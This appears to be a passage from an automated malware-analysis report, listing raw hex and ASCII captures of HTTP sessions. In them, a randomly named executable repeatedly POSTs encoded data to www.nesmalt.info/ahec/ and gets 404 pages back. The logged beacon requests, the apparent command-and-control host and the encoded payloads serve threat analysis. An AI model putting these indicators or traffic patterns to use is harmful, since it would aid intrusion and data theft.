34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                        Dec 2, 2023 18:50:36.837913990 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                        Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                        Dec 2, 2023 18:50:36.837939024 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                        Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                        Dec 2, 2023 18:50:36.837966919 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                        Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                        Dec 2, 2023 18:50:36.838129997 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                        Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.104973466.29.155.54805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:39.244920969 CET806OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.nesmalt.info
                                                                        Origin: http://www.nesmalt.info
                                                                        Referer: http://www.nesmalt.info/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 32 55 4f 42 30 52 7a 78 47 31 2b 7a 59 6e 4e 49 4e 6c 46 6b 43 52 70 69 73 56 51 66 7a 4b 52 6c 4e 44 52 63 43 74 6f 61 64 6a 76 76 4b 73 4b 58 64 77 46 47 43 67 65 68 4f 68 55 58 55 4f 36 55 47 64 53 33 32 6d 70 52 61 63 7a 67 65 62 4c 53 45 41 6b 44 50 41 62 4d 74 38 68 65 59 43 71 69 77 61 53 74 49 70 78 35 34 44 59 2b 37 48 58 45 6e 70 50 39 2f 39 4d 53 48 76 49 46 2f 71 47 64 61 2f 33 51 42 44 57 45 70 7a 6f 62 4e 2b 44 58 75 4a 45 4c 54 37 65 79 51 62 53 37 4e 52 51 52 7a 78 42 77 6a 68 77 6e 72 67 38 65 4b 64 38 79 42 61 63 78 34 58 62 75 33 53 45 3d
                                                                        Data Ascii: Ot=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKRlNDRcCtoadjvvKsKXdwFGCgehOhUXUO6UGdS32mpRaczgebLSEAkDPAbMt8heYCqiwaStIpx54DY+7HXEnpP9/9MSHvIF/qGda/3QBDWEpzobN+DXuJELT7eyQbS7NRQRzxBwjhwnrg8eKd8yBacx4Xbu3SE=
                                                                        Dec 2, 2023 18:50:39.526721954 CET1340INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:39 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                        Dec 2, 2023 18:50:39.526768923 CET1340INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                        Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                        Dec 2, 2023 18:50:39.526817083 CET1340INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                        Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                        Dec 2, 2023 18:50:39.526849985 CET1340INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                        Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                        Dec 2, 2023 18:50:39.526947021 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                        Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.104973566.29.155.54805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:50:41.947314978 CET1819OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.nesmalt.info
                                                                        Origin: http://www.nesmalt.info
                                                                        Referer: http://www.nesmalt.info/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 4f 52 44 6d 59 6c 34 34 41 45 53 77 32 55 4f 42 30 52 7a 78 47 31 2b 7a 59 6e 4e 49 4e 6c 46 6b 43 52 70 69 73 56 51 66 7a 4b 5a 6c 4e 78 70 63 44 4f 77 61 63 6a 76 76 44 4d 4b 55 64 77 45 47 43 67 47 6c 4f 68 4a 73 55 4e 43 55 47 2b 71 33 2b 30 4e 52 55 63 7a 67 44 4c 4c 58 4b 67 6b 57 50 41 4c 41 74 2f 4a 65 59 43 71 69 77 5a 36 74 4c 34 78 35 36 44 59 39 79 6e 58 2b 6a 70 50 52 2f 35 68 74 48 76 4e 79 38 65 4b 64 61 66 48 51 44 31 4b 45 68 7a 6f 5a 49 2b 44 50 75 4a 49 49 54 37 54 4a 51 61 57 56 4e 53 77 52 6c 56 41 59 78 53 49 39 35 67 56 47 4b 65 30 2b 4b 4d 31 75 67 30 76 78 73 48 6f 45 55 62 46 6d 46 44 44 46 5a 69 41 52 47 4c 4e 78 77 45 49 34 6d 6d 4f 70 43 5a 42 4e 51 36 39 6f 72 34 74 53 2f 65 67 51 7a 73 71 4e 4c 47 6b 74 68 79 46 44 44 76 39 30 6d 35 49 42 59 68 47 5a 6e 42 73 5a 66 4b 48 4b 6b 57 70 41 34 38 4c 69 72 49 74 64 7a 6e 79 6f 32 6a 7a 2b 2f 6f 58 53 46 6b 30 4f 50 59 49 52 42 31 6b 6c 46 31 57 2f 71 38 39 4f 6c 6f 76 36 66 36 42 63 59 32 36 45 37 75 6d 42 7a 49 78 42 6a 59 4f 77 54 4e 30 39 6a 79 50 56 51 67 47 69 38 72 51 78 4a 35 48 6d 6d 66 69 76 45 6b 65 64 4c 4d 34 62 69 71 54 63 59 50 73 54 57 64 2f 79 42 76 64 72 78 64 56 42 79 68 35 59 6a 72 37 64 58 76 76 50 4c 6e 4f 7a 35 79 57 54 78 6b 65 6c 4b 4b 49 69 70 65 50 73 64 58 7a 72 44 73 76 55 41 6c 69 48 56 6c 73 69 57 47 68 52 38 79 47 51 75 33 4f 62 7a 6b 43 77 4e 4a 76 45 73 49 57 50 61 52 74 39 56 6d 42 45 43 4b 6b 2f 57 64 75 36 39 54 52 4b 70 7a 31 72 6b 44 44 55 38 6d 36 76 4a 33 35 6a 5a 6b 73 4c 52 46 69 79 53 61 33 4b 57 4e 2b 31 66 61 43 62 78 4a 46 51 73 37 4c 74 4c 2b 70 59 4f 61 45 76 42 70 6f 36 50 4d 37 78 62 65 6b 50 5a 49 32 43 48 48 39 6c 57 61 72 37 79 35 34 4c 64 42 54 36 37 44 2f 77 30 75 48 4c 73 32 64 41 4a 56 66 44 55 6a 59 68 4b 6f 61 50 52 6c 68 4d 51 64 63 6d 2b 53 43 43 51 32 42 67 66 41 38 76 50 33 72 57 77 41 4f 4c 66 6a 38 30 36 34 53 5a 70 36 69 76 35 61 7a 66 57 4b 62 33 6f 41 2b 46 52 31 43 67 67 37 30 62 65 78 67 76 36 31 2f 49 4e 66 52 4e 31 47 35 48 68 73 30 50 65 6d 6b 2b 45 39 44 6c 68 79 53 37 6c 42 50 4f 79 78 78 4c 6e 4f 69 48 55 4a 4b 61 57 41 6e 4d 63 72 6f 4c 4c 6d 7a 71 72 2f 62 76 31 69 45 71 42 63 6f 62 39 51 59 47 78 38 42 42 2b 37 31 48 7a 34 32 74 48 79 46 75 45 4f 45 48 35 52 67 4a 55 44 6f 69 49 77 32 6d 4d 6c 73 2b 59 51 6b 58 30 67 52 36 55 42 36 30 46 6b 65 65 50 6d 4e 38 62 4e 50 63 5a 4e 38 4e 6f 34 52 56 46 62 65 64 61 72 77 73 52 58 35 5a 69 32 42 67 30 32 54 62 4f 46 58 4e 74 79 71 37 69 54 78 75 7a 58 44 64 59 49 39 6e 78 50 63 75 72 41 44 75 6f 6f 31 33 55 68 39 41 6d 45 63 36 4c 39 30 74 36 35 2f 47 65 6c 4a 59 6e 45 71 79 68 4c 57 69 64 4b 68 74 6b 30 59 4b 2f 54 73 41 53 6c 31 77 68 53 59 61 66 53 64 54 79 6e 54 51 57 54 30 45 38 55 6a 56 45 4f 4f 79 52 36 6e 6c 75 46 4e 59 71 6b 74 75 72 67 65 36 68 39 4d 56 4d 6b 69 33 55 35 72 44 55 63 49 59 48 38 36 5a 61 54 47 2f 65 47 70 56 54 77 76 64 4b 52 4d 73 45 6c 66 4f 47 31 58 30 74 35 4a 70 6f 57 4f 30 75 73 46 54 6d 75 79 67 38 37 34 46 6c 39 74 4c 4a 6a 5a 46 57 61 7a 7a 78 6e 2f 4a 35 68 46 31 37 4e 51 34 75 58 66 37 59 70 52 79 44 53 71 41 78 46 51 79 4f 35 68 57 77 47 42 6a 4c 45 71 53 77 4f 67 43 39 67 39 57 51 33 2b 4d 36 6b 51 49 4a 6c 57 77 52 48 34 44 68 30 58 43 75 55 68 76 36 44 4b 4d 42 6c 36 77 6f 6f 72 59 77 35 45 5a 4b 4d 4b 4c 52 79 70 74 72 2b 49 69 6f 39 54 37 70 32 56 6e 48 45 53 4a 63 72 70 75 78 76 30 2f 39 72 78 72 6a 6b 2f 34 69 41 59 4e 6c 7a 6b 66 45 76 7a 51 39 33 56 6e 66 56 73 70 55 73 4e 48 35 75 65 31 32 47 6b 57 31 4a 52 62 4b 36 75 48 61 31 62 2f 53 64 4d 69 2b 4a 5a 4f 55 77 44 2f 70 76 73 74 64 67 49 61 41 4b 6b 5a 55 2b 58 42 57 79 35 56
                                                                        Data Ascii: Ot=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKZlNxpcDOwacjvvDMKUdwEGCgGlOhJsUNCUG+q3+0NRUczgDLLXKgkWPALAt/JeYCqiwZ6tL4x56DY9ynX+jpPR/5htHvNy8eKdafHQD1KEhzoZI+DPuJIIT7TJQaWVNSwRlVAYxSI95gVGKe0+KM1ug0vxsHoEUbFmFDDFZiARGLNxwEI4mmOpCZBNQ69or4tS/egQzsqNLGkthyFDDv90m5IBYhGZnBsZfKHKkWpA48LirItdznyo2jz+/oXSFk0OPYIRB1klF1W/q89Olov6f6BcY26E7umBzIxBjYOwTN09jyPVQgGi8rQxJ5HmmfivEkedLM4biqTcYPsTWd/yBvdrxdVByh5Yjr7dXvvPLnOz5yWTxkelKKIipePsdXzrDsvUAliHVlsiWGhR8yGQu3ObzkCwNJvEsIWPaRt9VmBECKk/Wdu69TRKpz1rkDDU8m6vJ35jZksLRFiySa3KWN+1faCbxJFQs7LtL+pYOaEvBpo6PM7xbekPZI2CHH9lWar7y54LdBT67D/w0uHLs2dAJVfDUjYhKoaPRlhMQdcm+SCCQ2BgfA8vP3rWwAOLfj8064SZp6iv5azfWKb3oA+FR1Cgg70bexgv61/INfRN1G5Hhs0Pemk+E9DlhyS7lBPOyxxLnOiHUJKaWAnMcroLLmzqr/bv1iEqBcob9QYGx8BB+71Hz42tHyFuEOEH5RgJUDoiIw2mMls+YQkX0gR6UB60FkeePmN8bNPcZN8No4RVFbedarwsRX5Zi2Bg02TbOFXNtyq7iTxuzXDdYI9nxPcurADuoo13Uh9AmEc6L90t65/GelJYnEqyhLWidKhtk0YK/TsASl1whSYafSdTynTQWT0E8UjVEOOyR6nluFNYqkturge6h9MVMki3U5rDUcIYH86ZaTG/eGpVTwvdKRMsElfOG1X0t5JpoWO0usFTmuyg874Fl9tLJjZFWazzxn/J5hF17NQ4uXf7YpRyDSqAxFQyO5hWwGBjLEqSwOgC9g9WQ3+M6kQIJlWwRH4Dh0XCuUhv6DKMBl6woorYw5EZKMKLRyptr+Iio9T7p2VnHESJcrpuxv0/9rxrjk/4iAYNlzkfEvzQ93VnfVspUsNH5ue12GkW1JRbK6uHa1b/SdMi+JZOUwD/pvstdgIaAKkZU+XBWy5V
                                                                        Dec 2, 2023 18:50:42.226286888 CET1340INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:42 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 